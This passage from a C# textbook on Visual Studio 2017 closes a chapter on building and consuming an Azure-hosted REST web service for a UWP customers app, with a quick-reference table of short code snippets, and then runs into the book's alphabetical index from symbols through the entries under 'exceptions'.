users. Visual Studio 2017, together with Azure and C#, will undoubtedly be instrumental in helping you to address these challenges.
Quick reference
To: Create an entity model by using the Entity Framework
Do this: Add a new item to your project by using the ADO.NET Entity Data Model template. Use the Entity Data Model Wizard to connect to the database containing the tables that you want to model, and select the tables that your app requires. In the data model, remove any columns that are not used by your app (as long as they have default values, if your app is inserting new items into the database).

To: Create a REST web service that provides remote access to a database through an entity model
Do this: Create an Azure API App by using the ASP.NET Web Application template. Run the Add Scaffold wizard and select Web API 2 Controller With Actions, Using Entity Framework. Specify the name of the appropriate entity class from the entity model as the model class, and the data context class for the entity model as the data context class.

To: Deploy a REST web service to the cloud as an Azure API app
Do this: In Visual Studio, connect to your Azure subscription. Then use the Publish Web wizard to publish your web service as an Azure App Service. Specify an appropriate service plan that will support the volume of traffic that your web service expects to handle.

To: Consume a REST web service published as an Azure API app in a UWP application
Do this: Run the REST API Client wizard in Visual Studio, and specify the Azure API app that provides access to your web service. The wizard downloads the metadata for the web service and creates a model, which it adds to your project.

To: Retrieve data from a REST web service in a UWP app
Do this: Instantiate the connection class defined by the model created by the REST API Client wizard. Call the appropriate Get method in the Operations object available through the connection class. For example:

AdventureWorksService service = new AdventureWorksService();
var data = service.CustomersOperations.GetCustomers();

To: Add a new data item to a REST web service from a UWP app
Do this: Use the appropriate Post method of the Operations object available through the connection class. Pass the new data item as the parameter to this method. If the operation is successful, the value returned is a copy of the newly created object. For example:

AdventureWorksService service = new AdventureWorksService();
var cust = await service.CustomersOperations.PostCustomerAsync(this.Current);

To: Update an existing item in a REST web service from a UWP app
Do this: Use the appropriate Put method of the Operations object available through the connection class. Pass the key and the data for the modified item as parameters. For example:

AdventureWorksService service = new AdventureWorksService();
await service.CustomersOperations.PutCustomerAsync(this.Current.CustomerID, this.Current);
Download from finelybook [email protected]
1083
Index
Symbols
& (ampersand)
& (AND) operator, 365
&& (logical AND) operator, 365
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
< entity, 109
in XML, 109
< > (angle brackets)
>= (greater than or equal to) operator, 96, 99, 112
> (greater than) operator, 96, 99, 112
<< (left-shift) operator, 365
<= (less than or equal to) operator, 96, 99, 112
< (less than) operator, 96, 99, 112
in XML, 109
* (asterisk)
*= (compound multiplication) operator, 116
* (multiplication) operator, 47
@ (at sign), 184
{ } (braces), 54, 62, 64, 179, 231, 252
^ (caret), XOR operator, 366
= (equal sign)
Download from finelybook [email protected]
1084
= (assignment) operator, 39
associativity, 54–56, 99
precedence, 99
== (equality) operator, 96, 99, 112, 510
=> (lambda) operator, 64, 425
! (exclamation mark)
!= (inequality) operator, 96, 99, 112, 510
! (NOT) operator, 96
/ (forward slash)
/= (compound division) operator, 116
/ (division) operator, 47
- (hyphen)
-= (compound subtraction) operator, 116, 455, 467, 476
-- (decrement) operator, 56–57, 59, 116, 146, 508–509
- (subtraction) operator, 47
() (parentheses)
in if statements, 100
in method calls, 62, 66
precedence override, 54
% (percent sign)
%= (compound modulus) operator, 116
% (modulus) operator, 48
. (period)
dot notation, 284
dot operator, 316
| (pipe)
|| (logical OR) operator
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
| (OR) operator, 365
Download from finelybook [email protected]
1085
+ (plus sign)
+ (addition) operator, 47
+= (compound addition) operator, 116, 466, 476
++ (increment) operator, 56–57, 59, 116, 146, 508–509
? (question mark)
indicating nullable types with, 191–192, 210
? (null-conditional) operator, 190–191, 207
" (quotation marks, double), 111
as delimiters, 111
in XML, 109
' (quotation marks, single), 111
; (semicolon)
in enumeration variable declarations, 227
in method declarations, 63
statement termination, 35–36, 38
in structure variable declarations, 227
[ ] (square brackets), 54, 229, 252
~ (tilde)
in destructor declarations, 317, 335
~ (NOT) operator, 365
_ (underscore), 38, 364
A
abstract classes
abstract methods, 306
declaring, 314
defining, 305–306
implementing, 307–311
quick reference, 314
sealed classes, 306–307
sealed methods, 307
Download from finelybook [email protected]
1086
abstract keyword, 306, 313, 314
abstract methods, 306
abstracting tasks, 545–549
Accelerate method, 280
accessibility
of classes, 162–163
of properties, 346
accessor methods, 368–369
indexers, 368
properties, 342–343
Action type, 529, 676
Action<T, …> delegates, 452
adapter methods, 464–465
Add Controller dialog box, 719
Add Existing Project dialog box, 446
Add method, 413, 419, 421, 423, 432, 455, 737
Add Reference command, 17
Add Scaffold wizard, 718
AddAfter method, 415
AddBefore method, 415
AddCardToHand method, 246, 430
AddCustomer command, 736
AddFirst method, 415
AddItemToLocalCache method, 583
addition (+) operator, 47
AddLast method, 415
AddParticipant method, 596
AddToAccumulator method, 550
addValues method, 51, 62–65, 143
ADO.NET, 709–710
AdventureWorksEntities class, 716–717
AdventureWorksModel class, 712–713
Download from finelybook [email protected]
1087
AdventureWorksService class, 710–712, 731
AdventureWorksService project. See also Customers application
AdventureWorks database
entity model, 709–717
REST web service deployment, 724–726
retrieving data from, 707–709
entity model, creating, 710–717
AdventureWorksEntities, 716–717
AdventureWorksModel, 712–713
AdventureWorksService, 710–712
Entity Data Model Wizard, 712–716
REST web service
adding/editing data with, 733–741
Azure API app security, 729–730
creating, 718–724
deploying to Azure, 724–726
idempotency, 733
PostCustomerWithHttpMessagesAsync method, 742
retrieving data with, 726–732
AggregateException, 562–563, 565
aggregating data, 485–487
Airplane class, 279–280
All method, 491
allocation of memory, asynchronous methods and, 582–583
ampersand (&)
AND (&) operator, 365
logical AND (&&) operator, 365
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
in XML, 109
Download from finelybook [email protected]
1088
AND operators
AND (&), 365
logical AND (&&), 97
associativity, 99
precedence, 99
short-circuiting, 97–98
syntax, 97
angle brackets (<>)
greater than (>) operator, 96, 99, 112
greater than or equal to (>=) operator, 96, 99, 112
left-shift (<<) operator, 365
less than (<) operator, 96, 99, 112
less than or equal to (<=) operator, 96, 99, 112
in XML, 109
anonymous classes, 179–180
anonymous methods, 426–427
Any method, 491
AppBarButton control, 683
App.config file, 8
application logic, decoupling
delegates
Action<T, …>452
adding methods to, 455
in automated factory scenario, 453–456
declaring, 454, 456–464, 475
defined, 450
examples of, 451–452
Func, 451–452
Func<T, …>452
function pointers compared to, 451
instantiating, 475
invoking, 454–455, 475
Download from finelybook [email protected]
1089
lambda expressions and, 464
method adapters, 464–465
overview, 450–451
performCalculationDelegate, 450–451
removing methods from, 455
events
declaring, 465–466, 475
event sources, 465
overview, 465
raising, 467, 469–475, 477
subscribing to, 466–467, 476
unsubscribing from, 467, 476
user interface, 468–469
applications. See also projects
console
creating in Visual Studio 2017, 3–14, 34
defined, 3
namespaces, 14–17
graphical, 18–27, 34
adding code to, 30–32
App.xaml.cs file, 28–30
building and running, 25–26, 34
Button control, 24–25
MainPage.xaml.cs file, 27–28
pages in, 21
TextBlock control, 21–24
views of, 18
WPF App template, 33
indexers in, 372–378
AppStyles.xaml file, 646
App.xaml.cs file file, 28–30
Area method, 164, 190–191
Download from finelybook [email protected]
1090
areYouReady variable, 96
ArgumentException, 246, 257, 261–262, 285
ArgumentOutOfRangeException, 149, 237
arguments, 256–257. See also parameters (method)
in arrays, 256–257
EventArgs, 469
arithmetic operators
applying to int values, 49–54
associativity, 54–56, 98
checked versus unchecked integer arithmetic, 144–145
data types and, 47–49
overview of, 47
precedence, 54, 98
prefix and postfix forms, 56–57
Array class. See arrays
arrays. See also indexers
accessing elements of
single elements, 233, 252
value types, 249–251
arguments, 256–257
Cards project, 240–248
AddCardToHand method, 246
DealCardFromPack method, 243
dealClick method, 246
IsCardAlreadyDealt method, 244
IsSuitEmpty method, 243–244
for loop, 247–248
Pack class, 242–243
PlayingCard class, 241–242
randomCardSelector variable, 242
ToString method, 245
Value enumeration, 241
Download from finelybook [email protected]
1091
collections compared to, 427
copying, 236–238
declaring, 229–230, 252
defined, 229
empty, 231
finding number of elements in, 233, 252
implicitly typed, 232–233
indexers compared to, 369
initializing, 231–232, 252
instantiating, 230–231, 252
iterating through, 233–235, 252
jagged, 239–240, 253
Main method and, 236
multidimensional, 238, 253, 258
parameter
advantages of, 255
declaring, 257–259, 266
int data type in, 257–258
optional parameters compared to, 263–265
params object[]259–260
priority of, 259
quick reference, 266
Sum method used with, 260–263
passing as parameters, 235–236
populating, 231–232
quick reference, 252–253
returning from methods, 235–236
The Art of Computer Programming, Volume 3 (Knuth), 388
as operator, 202–203, 207
AsParallel method, 585–590, 608
ASP.NET Web API template, 722
assemblies
Download from finelybook [email protected]
1092
core, 17
defined, 7–8
namespaces and, 17
references for, 17
assignment operator, simple (=)
associativity, 54–56, 99
overview, 39
precedence, 99
assignment operators
compound
associativity, 116
examples of, 132
overview, 115–116
precedence, 116
table of, 116
simple assignment (=)
associativity, 54–56, 99
overview, 39
precedence, 99
associativity of operators, 503
arithmetic operators, 54–56
Boolean operators, 98–99
compound assignment operators, 116
table of, 98–99
asterisk (*)
compound multiplication (*=) operator, 116
multiplication (*) operator, 47
async keyword, 571–572, 608
asynchronous methods
common errors with, 579–580
defining, 608
async keyword, 571–572
Download from finelybook [email protected]
1093
await operator, 572–574
GraphDemo project, 575–577
return values, 578–579
IAsyncResult design pattern, 584–585
Main method and, 573
overview, 567, 568
problem solved by, 568–571
scalability and, 568
tasks and memory allocation, 582–583
Windows Runtime APIs and, 580–582
AuditingCompleteDelegate, 470
audit-nnnnnn.xml file, 458
Auditor class, 460, 470–475
AuditOrder method, 463, 471
AuditProcessingComplete event, 470–471
AuditService project, 459
automated factory scenario, delegates in, 453–456
automatic properties, 353–355, 358–359, 361
AutomaticProperties project, 358–359
await operator, 555, 564, 572–574, 608
Azure API app security, 729–730
B
Barrier class, 596
base keyword, 270, 275, 288
base16 notation, 364
base-class constructors, 270–271, 288
baseToConvertTo method, 285
BasicCollection<T> class, 443–444
BeginOperationName method, 584
BeginWrite method, 584
Download from finelybook [email protected]
1094
binary notation, 364
binary operators, 504
binary trees
binary tree class, 391–399
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
Tree<TItem> class, 392–399
InsertIntoTree method, 400–402
nodes, 388
subtrees, 388
theory of, 388–390
binary values
binary notation, 364
displaying, 365
hexadecimal notation, 364
manipulating, 365–366
obo prefix, 364
operators for, 365–366
storing, 364
BinarySearch method, 407
BinaryTree project, 392–396, 445–447
BinaryTreeTest project, 396–399
binding. See data binding
BitArray class, 412
bitwise operators, 365–366
Black.Hole method, 259–260
Blank App template, 615–617, 655
blocks
do statements, 124
if statements, 100–101
while statements, 118, 122
bool data type, 40
Download from finelybook [email protected]
1095
bool keyword, 215
bool variables, 95–96
Boolean expressions
creating, 112
in if statements, 99–100
overview, 95–96
Boolean operators
associativity, 98–99
conditional logical operators, 97
defined, 96
equality operators, 96
precedence, 98–99
relational operators, 96
short-circuiting, 97–98
Boolean variables, 95–96, 112
bottlenecks (CPU), identifying, 533–545
boxing, 199–200, 207
braces ({ }), 54, 62, 64, 179, 231, 252
brackets ([ ]), 54, 229, 252
Brake method, 280
break statement, 109, 124
Build Solution command (Build menu), 11, 34
BuildTree project, 400–402
Button class, 468
Button control, 24–25
byte keyword, 215
C
calculateClick method, 67, 69, 71, 143, 150, 152
calculateData method, 547–548
CalculateFactorial method, 83–84
Download from finelybook [email protected]
1096
calculateFee method, 76–77, 81, 89–92
CalculatePI project, 600–603
calculateValue method, 578
calculateValueAsync method, 578
Calculator class, 327–333
calling methods, 93
base-class constructors, 270–271, 288
constructors, 181
delegates, 454–455, 475
destructors, 335
generics, 409
multiple return values, 68–70, 93
from other objects, 68
syntax, 65–68
camelCase notation, 38, 163
CanBrowse property (ViewModel), 735
Canceled task status, 557
cancellation
PLINQ (Parallel LINQ) queries, 587–590
synchronization, 596–597
tasks, 551–561, 566
tokens, 551–552, 590
CancellationToken object, 551–552, 590
CancellationTokenSource object, 590, 610
CanExecute method, 675, 676–677
CanExecuteChanged event, 677–678
CanExecuteChanged method, 675
canExecuteChangedEventTimer_Tick method, 678
CanSaveOrDiscardChanges property (ViewModel), 735
canvases, 296
Car class, 280–281
Cards project, 240–248
Download from finelybook [email protected]
1097
AddCardToHand method, 246
collection classes, 427–431
DealCardFromPack method, 243
dealClick method, 246
IsCardAlreadyDealt method, 244
IsSuitEmpty method, 243–244
for loop, 247–248
Pack class, 242–243
PlayingCard class, 241–242
randomCardSelector variable, 242
ToString method, 245
Value enumeration, 241
cardsInSuit object, 428
caret (^), XOR operator, 366
cascading if statements, 101–106
case keyword, 107
case labels, 107–108
case sensitivity, 36
casting, 202
InvalidCastException, 201
is operator, 202
as operator, 202–203
quick reference, 207
switch statement, 203–204
catch statement
example of, 156
throw/catch blocks, 151–153
try/catch blocks
multiple catch handlers, 136–137
multiple exceptions, catching, 137–138
syntax, 134–135
when keyword, 138–142
Download from finelybook [email protected]
1098
catching exceptions, 156
multiple catch handlers, 136–137
multiple exceptions, 137–138
try/catch blocks, 134–135
when keyword, 138–142
char data type, 40
checked integer arithmetic, 144–145
expressions, 145
statements, 145
checked keyword, 144–145
checked expressions, 146–148
checked statements, 145
example of, 156
CheckoutButtonClicked method, 460, 462, 463, 469–470, 473
CheckoutController class, 460–463
CheckoutDelegate, 461
CheckoutProcessing delegate, 461
CheckoutService project, 461–463
CIL (Common Intermediate Language), 226
Circle class, 301–302
accessibility, 162
Area method, 190–191
automatic properties, 354–355
comparable, 391–393
constructors, 164–165
copying, 185–186
defining, 160–161
initializing, 189
NumCircles field, 174–175
partial class, 166
class keyword, 160–161
class methods. See static methods
Download from finelybook [email protected]
1099
classes. See also methods; objects; individual class names
abstract
abstract methods, 306
declaring, 314
defining, 305–306
implementing, 307–311
quick reference, 314
sealed classes, 306–307
sealed methods, 307
accessibility, 162–163
anonymous, 179–180
assigning, 271–273
class libraries, 391
Classes project, 166–172
collection classes
card game application, 427–431
defined, 411
Dictionary<TKey, TValue>412, 418–420
HashSet<T>412, 421–422
LinkedList<T>412, 415–416
List<T>412, 413–416
Queue<T>412, 416–417
SortedDictionary<TKey, TValue>420
SortedList<TKey, TValue>412, 420–421
Stack<T>412, 417–418
table of, 411–412
comparing operators in, 509–510
concurrent collection
ConcurrentBag<T>597
ConcurrentDictionary<TKey, TValue>597
ConcurrentQueue<T>597
ConcurrentStack<T>597
Download from finelybook [email protected]
1100
thread-safe data access, 598–607
constructors, overloading, 164–165
copying, 185–186, 206
declaring, 180
defining, 160–161
encapsulation
implementing, 339–341
purpose of, 160
fields, 162
generalized
creating with generics, 384–387
creating with object type, 381–384
vs. generics, 387
generic
binary tree class, 391–399
binary tree theory, 388–390
System.IComparable interface, 391–393
System.IComparable<T> interface, 391–393
indexers in, 379
inheritance, 268
naming guidelines, 163
objects compared to, 161
partial, 165–172
private, 162–163
public, 162–163
purpose of, 159–160
quick reference, 180–181
referencing through interfaces, 292–293
scope, 72
sealed, 306–307, 314
static, 175–176
static fields in
Download from finelybook [email protected]
1101
creating, 175
shared, 174–175
structures compared to, 217–218
Windows Runtime compatibility, 311–313
Classes project, 166–172
classification, 159–160
Clone method, 185–186, 237–238
CLR (common language runtime), 85, 226, 311
code, managed, 226
code, native, 226
Code and Text Editor window, 6
code view, 18
Collect method, 320, 335
collections
arrays compared to, 427
collection classes
card game application, 427–431
defined, 411
Dictionary<TKey, TValue>412, 418–420
HashSet<T>412, 421–422
LinkedList<T>412, 415–416
List<T>412, 413–416
Queue<T>412, 416–417
SortedDictionary<TKey, TValue>420
SortedList<TKey, TValue>412, 420–421
Stack<T>412, 417–418
table of, 411–412
concurrent collection classes
ConcurrentBag<T>597
ConcurrentDictionary<TKey, TValue>597
ConcurrentQueue<T>597
ConcurrentStack<T>597
Download from finelybook [email protected]
1102
thread-safe data access, 598–607
creating, 432
elements of
adding, 413, 415, 419, 420, 421, 432
finding number of, 432
iterating through, 414, 415–416, 419, 420, 433
locating, 415, 433
removing, 413, 415, 421, 432
enumerating
EnumeratorTest project, 442–443
IEnumerable interface, 436, 441–443
IEnumerator<T> interface, 436
iterators, 443–447
manual enumerator implementation, 437–440
overview, 435–436
quick reference, 448
Find methods, 423–425
initializers, 422–423
iterating through
parallelized query, 587–590
parallelized query over simple collection, 585–587
lambda expressions
anonymous methods and, 426–427
defined, 423–424
features of, 426
forms of, 425–426
syntax, 424–425
pointsList, 605
predicates, 423–425
quick reference, 432–433
System.Collections namespace, 412
thread-safe, 605–606
Download from finelybook [email protected]
1103
Collections namespace, 412
COM (Component Object Model), 85
ComboBox control, 624–625, 669–671
Command class, 675–678
Command element (CustomerVoiceCommands.xml), 688
CommandBar control, 683
commands
adding to ViewModel, 675–685
ICommand interface, 675–678, 701
NextCustomer command, 679–682
Next/Previous buttons, 682–685
PreviousCustomer command, 679–682
NextCustomer, 679–682
PreviousCustomer, 679–682
CommandSet element (CustomerVoiceCommands.xml), 688
comments, TODO, 167
Common Intermediate Language (CIL), 226
common language runtime (CLR), 85, 226, 311
Compare method, 106, 406
compareClick method, 103–104
CompareTo method, 290, 391, 395, 492
comparing
dates
Compare method, 106
dateCompare method, 102–106
operators, 509–510
Complex class, 514–516, 519–521
Complex type, 511
ComplexNumbers project, 511–514
Component Object Model (COM), 85
compound assignment operators
associativity, 116
Download from finelybook [email protected]
1104
checked expressions, 146
delegates and, 455
evaluation of, 507–508
events and, 466, 476
examples of, 132
overview, 115–116
precedence, 116
quick reference, 132
table of, 116
computer memory. See memory
concatenating strings, 47–48
concurrent access to data, synchronizing
concurrent collection classes
ConcurrentBag<T>, 597
ConcurrentDictionary<TKey, TValue>, 597
ConcurrentQueue<T>, 597
ConcurrentStack<T>, 597
locked data, 593–594
overview, 590–593
synchronization primitives for coordinating tasks, 593–594, 596–597
thread-safe data access, implementing, 598–607
concurrent collection classes
ConcurrentBag<T>, 597
ConcurrentDictionary<TKey, TValue>, 597
ConcurrentQueue<T>, 597
ConcurrentStack<T>, 597
thread-safe data access, implementing, 598–607
ConcurrentBag<T> class, 597
ConcurrentDictionary<TKey, TValue> class, 597
ConcurrentQueue<T> class, 597
conditional logical operators, 97
Configure App Service Plan dialog box, 725
Console Application template, 4
console applications
creating in Visual Studio 2017, 3–14, 34
building and running, 11–14
files, 7–8
IntelliSense icons, 11
Main method, 8–10
defined, 3
namespaces
assemblies and, 17
bringing into scope, 15
defining classes in, 14–15
longhand names, 16
Console class
ReadLine method, 76
Write method, 76
WriteLine method, 73
Console.WriteLine method, 40, 214, 255–256, 260
const fields, 175
const keyword, 175
constantExpression identifier, 107–108
constraints
generics, 387, 408
operator, 504
constructors
base-class, 270–271, 288
calling, 181
declaring, 163–164, 180
default, 164
order of, 165
overloading, 164–165
public versus private, 164
Contains method, 433
continuations, task, 530–531, 563–564, 565
continue statement, 124
ContinueWith method, 530–531, 565
contravariance, generic interfaces and, 406–408, 409
Controller class, 453–456
controls. See also classes; user interfaces
AppBarButton, 683
Button, 24–25
ComboBox, 624–625, 669–671
CommandBar, 683
Grid, 655
adapted layout with Visual State Manager, 640–643
background, 647–648
in scalable user interface, 619–620
tabular layout with, 630–639
ProgressRing, 747
Rectangle, 659
TextBlock
adding to forms, 21–24
in scalable user interface, 620–622, 625–626
styles applied to, 649–651
TextBox
data binding in, 661, 664–665
in scalable user interface, 622–624, 625–626
conversion operators
built-in, 517
narrowing conversions, 517
overview, 516–517
user-defined, 518
widening conversions, 517
writing, 519–521, 522
converting strings to integers, 59
ConvertToBase method, 285–287
Convert.ToChar method, 127
Convert.ToString method, 365, 378
cooperative cancellation of tasks, 551–561, 566
copies
deep, 185, 238
shallow, 185
Copy method, 237
CopyCustomer method, 736
copying
arrays, 236–238
classes, 185–186, 206
shallow, 237–238
structure variables, 223
value types, 183–189, 206, 216
copyOne method, 110–111
CopyTo method, 237
core assemblies, 17
cores, processor, 526–527
Cortana searches
quick reference, 701
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice activation, 691–695
Count method, 490
Count property (collections), 432
CountdownEvent class, 595
covariance, generic interfaces and, 404–405, 409
CPU bottlenecks, identifying, 533–545
Create App Service dialog box, 726
Created task status, 556
.csproj file extension, 41
curly brackets ({ }), 54
Current property
IEnumerable interface, 436, 440
ViewModel class, 673
currentCustomer variable, 673
currentNodeValue variable, 395
Customer class, 659–660, 665–668
CustomerOperationsExtension class, 728
Customers application, 734–740
adapting with Visual State Manager, 639–645
adding commands to, 675–685
Command class, 675–678
NextCustomer command, 679–682
Next/Previous buttons, 682–685
PreviousCustomer command, 679–682
building with Blank App template, 615–617
Cortana searches
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
vocal responses to voice commands, 697–700
voice activation, 691–695
displaying data with data binding, 658–664
error reporting, 742–746
scalable user interface, 618–627
ComboBox control, 624–625
Grid control, 619–620
TextBlock control, 620–622, 625–626
TextBox control, 622–624, 625–626
styles applied to, 646–654
tabular layout, 630–639
UI updates, 746–749
CustomersController class, 719–722
CustomersInMemory class, 588
CustomersOperations class, 728
CustomerVoiceCommands.xml file, 687–690
D
DailyRate project
application logic, 73–74
method declarations, 74–77
optional parameters and named arguments, 88–92
stepping through, 78–81
dangling references, 251, 319
data
aggregating, 485–487
displaying, 658–664
filtering, 484–485, 501
grouping, 485–487, 501
joining, 487–488, 502
modifying with data binding, 664–669
INotifyPropertyChanged interface, 665–668, 700
nameof operator, 668–669
two-way data binding, 664–665, 700
ordering, 485–487, 501
privacy, 185–186
retrieving with REST web services, 703–709, 726–732, 750
creating, 718–724
deploying to Azure, 724–726
retrieving data with, 726–732
searching for with Cortana
registration of voice commands, 690–691
testing, 695–696
VCD (voice-command definition) files, 687–690
voice activation, 691–695
selecting, 482–484, 501
data access
concurrent access to data, synchronizing
canceling synchronization, 596–597
concurrent collection classes, 597
locked data, 593–594
overview, 590–593
synchronization primitives for coordinating tasks, 594–596
parallelizing. See parallelism
remote databases, 703. See also REST (Representational State Transfer) web services
data retrieval, 703–709
Entity Framework, 704
entity model, creating, 709–717, 750
quick reference, 750–751
thread-safe, 598–607
data binding, 643
with ComboBox control, 669–671
displaying data with, 658–664
INotifyPropertyChanged interface, 665–668, 700
modifying data with, 664–669
INotifyPropertyChanged interface, 665–668, 700
nameof operator, 668–669
two-way data binding, 664–665, 700
nameof operator, 668–669
quick reference, 700–701
two-way, 664–665, 700
data types. See value types
database-first approach to entity modeling, 710
databases, remote. See remote databases, accessing
DataTypes project, 459
Date structure, 220–221
dateCompare method, 102–106
dates, comparing
Compare method, 106
dateCompare method, 102–106
deadlocks, 580
DealCardFromPack method, 243
dealClick method, 246
Debug mode
applications, building and running, 13, 70, 90
exception settings, 148
iteration statements, stepping through, 127–131
methods, stepping through, 78–81
Debug toolbar, 94
decimal data type, 40
decimal keyword, 215
decision statements
Boolean operators
associativity, 98–99
conditional logical operators, 97
defined, 96
equality operators, 96
precedence, 98–99
relational operators, 96
short-circuiting, 97–98
Boolean variables, declaring, 95–96
if
blocks, 100–101
cascading, 101–106
common errors in, 100
syntax, 99–100, 112–113
when to use, 99
quick reference, 112–113
switch
rules for, 108–109
SwitchStatement exercise, 109–112
syntax, 107–108, 113
when to use, 107
declaring. See also defining
arrays, 229–230, 252
classes, 180
abstract, 306, 314
sealed, 306–307, 314
constructors, 180
delegates, 450–451, 454, 456–464, 475
enumerations, 210, 227
events, 465–466, 475
inheritance, 288
interface properties, 348–349
methods, 62–63, 93
constructors, 163–164
extension, 283–287, 288
new methods, 273–274
override, 275–276, 288
static, 181
valid keyword combinations, 313
virtual, 274–275, 277, 288
namespaces, 616
operators
conversion, 518
decrement (--), 508–509
increment (++), 508–509
overloaded, 504–505
pairs of, 510
symmetric, 506–507, 519
parameter arrays, 257–259, 266
properties
automatic, 353–355, 358–359, 361
interface, 361
read-only, 345, 360
static, 344
syntax, 341–342, 360
write-only, 345, 360
structures, 216, 227
variables
Boolean, 95–96, 112
enumeration, 210–211, 227
structure, 218, 227
syntax, 38–39, 59
deconstructing objects, 172–173
deconstructors, 172–173
decrement (--) operator, 59, 116, 146, 508–509
decrement operator (--), 56–57
decrementing variables, 56–57, 59, 116
deep copies, 185, 238
default constructors, 164
default keyword, 107, 441
deferred evaluation, LINQ (Language-Integrated Query) and, 497–500
defining. See also declaring
asynchronous methods, 608
async keyword, 571–572
await operator, 572–574
common errors, 579–580
GraphDemo project, 575–577
problem solved by, 568–571
return values, 578–579
classes, 160–161
abstract, 305–306, 314
sealed, 306–307, 314
interfaces, 290–291, 296–304, 314
method parameters
optional parameters, 86, 94
syntax, 62
method scope
class, 72
local, 71
definite assignment rule, 40
delegate keyword, 454, 475
delegates. See also events
Action<T, …>, 452
adding methods to, 455
in automated factory scenario, 453–456
declaring, 450–451, 454, 456–464, 475
defined, 450
examples of, 451–452
Func, 451–452
Func<T, …>, 452
function pointers compared to, 451
instantiating, 475
invoking, 454–455, 475
lambda expressions and, 464
method adapters, 464–465
overview, 450–451
performCalculationDelegate, 450–451
quick reference, 475
removing methods from, 455
Delegates project
delegates, 457–460
events, 470–475
DELETE requests, 733
DeleteCustomer method, 721
DeliveryService project, 459
deploying REST web services, 724–726, 750
Dequeue method, 382–384, 411–412, 432
derived classes, declaring, 268
DerivedClass, 268
Design Patterns (Gamma et al), 465
design view, 18
destroying objects, 316
destructors. See also garbage collection
restrictions on, 317–318
writing, 316–318, 335
Dictionary<TKey, TValue> class, 412, 418–420
directives. See statements
DiscardChanges command, 738
Dispatcher object, 571
DispatcherTimer class, 678
displayData method, 119–121
displaying data with data binding, 658–664
displayMessage method, 473–474
disposal methods, 321–322
Dispose method, 120, 154–155, 324–326, 440
GarbageCollectionDemo project, 329–331
preventing objects being disposed of more than once, 330–332
thread safety and, 332–333
DistanceTo method, 170–171
Distinct method, 487, 490
Divide method, 68–70, 327
DivideByZeroException, 152, 563
divideValues method, 53
division (/) operator, 47
do statements
blocks, 124
example of, 132
stepping through, 127–131
syntax, 124
writing, 125–127
doAdditionalProcessing method, 592–593, 602
doAuditing method, 471
Document Outline window, 50
Documents folder, 5
doFirstLongRunningOperation method, 573–574
doIncrement method, 193–194
doInitialize method, 195
doMoreAdditionalProcessing method, 592
doMoreWork method, 530
doSecondLongRunningOperation method, 570
doShipping method, 472
DoStatement project, 125–131
dot notation, 284
dot operator (.), 316
doThirdLongRunningOperation method, 570
double data type, 39, 40
converting int to, 517
converting to int, 517
double keyword, 215
double quotation marks (")
as delimiters, 111
in XML, 109
doWork method
Classes project, 166–167, 168–169
ComplexNumbers project, 513, 516
ExtensionMethod project, 286
optional parameters, 265
Parameters project, 187, 196
QueryBinaryTree project, 493–496
StructsAndEnums project, 213–214, 222–223, 224
Vehicles project, 280–281
DoWorkWithData method, 85–86
Draw method, 299, 301
Drawing project
abstract classes, 307–311
interfaces, 296–304
properties, 349–353
drawingCanvas_Tapped method, 302–303, 351–353
DrawingShape class, 308–311, 349–353
Drive method, 280
E
Edit menu commands, Find and Replace, 43
Edit method, 738
EditCustomer command, 738
editing databases, 733–741
elements of arrays
accessing, 233, 252
empty arrays, 231
finding number of, 233, 252
iterating through, 233–235, 252
elements of collections
adding, 432
Dictionary<TKey, TValue>, 419
HashSet<T>, 421
LinkedList<T> class, 415
List<T> class, 413
SortedDictionary<TKey, TValue>, 420
finding number of, 432
iterating through, 433
Dictionary<TKey, TValue>, 419
LinkedList<T> class, 415–416
List<T> class, 414
SortedDictionary<TKey, TValue>, 420
locating, 415, 433
removing, 432
HashSet<T>, 421
LinkedList<T> class, 415
List<T> class, 413
Employee class, 491–492
empty arrays, 231
empty strings, 376
encapsulation
implementing, 339–341
purpose of, 160
EndOperationName method, 584
EndWrite method, 584
Enqueue method, 382–384, 411–412
EnterReadLock method, 595, 609
EnterWriteLock method, 595, 609
Entity Data Model Wizard, 712–716
Entity Framework, 704
entity models, creating, 709–717, 750
enum keyword, 210, 227
enum types. See enumerations
enumeration variables
assigning to values, 227
declaring, 210–211, 227
operators and, 211
enumerations
of collection elements
EnumeratorTest project, 442–443
IEnumerable interface, 436, 441–443
IEnumerator<T> interface, 436
iterators, 443–447
manual enumerator implementation, 437–440
overview, 435–436
quick reference, 448
declaring, 210, 227
enumeration variables
assigning to values, 227
declaring, 210–211, 227
operators and, 211
literal names, 210
literal values, 211
nullable, 210
overview, 209
quick reference, 227
Season
declaring, 210
enumeration variables, declaring, 210–211
StructsAndEnums project, 212–214
TaskContinuationOptions, 530–531
TaskCreationOptions, 530
underlying types, 212
Value, 241
enumerators
defining, 445–447
IEnumerable interface, 436, 441–443
IEnumerator<T> interface, 436
iterators
defined, 443
defining enumerators with, 445–447
simple example, 443–445
manual implementation, 437–440
quick reference, 448
EnumeratorTest project, 442–443
equal sign (=)
assignment (=) operator, 39
associativity, 54–56, 99
precedence, 99
equality (==) operator, 96, 99, 112, 510
lambda (=>) operator, 64, 425
equality (==) operator, 96, 99, 112, 510
Equals method, 216, 510, 514
equals operator, 490
error reporting, database, 742–746
errors. See exceptions
EventArgs argument, 469
events, 465–466. See also delegates
declaring, 465–466, 475
event sources, 465
overview, 465
quick reference, 475–477
raising, 467, 469–475, 477
subscribing to, 466–467, 476
unsubscribing from, 467, 476
user interface, 468–469
exceptions, 133–134
AggregateException, 562–563, 565
ArgumentException, 246, 257, 261–262, 285
ArgumentOutOfRangeException, 149, 237
catching
example of, 156
multiple catch handlers, 136–137
multiple exceptions, 137–138
try/catch blocks, 134–135
when keyword, 138–142
checked versus unchecked arithmetic, 144–145
expressions, 146–148
statements, 145
DivideByZeroException, 152, 563
filtering, 138–142
FormatException, 134–135
IndexOutOfRangeException, 233, 563
inheritance hierarchies, 137
InvalidCastException, 201, 384, 404
InvalidOperationException, 151–152, 153, 413, 440
NotImplementedException, 243, 299, 439
NullReferenceException, 190
OperationCanceledException, 559–560, 596
OutOfMemoryException, 198, 238
OverflowException, 135, 144–149, 517
checked expressions, 146–148
checked statements, 145
propagating, 142–144
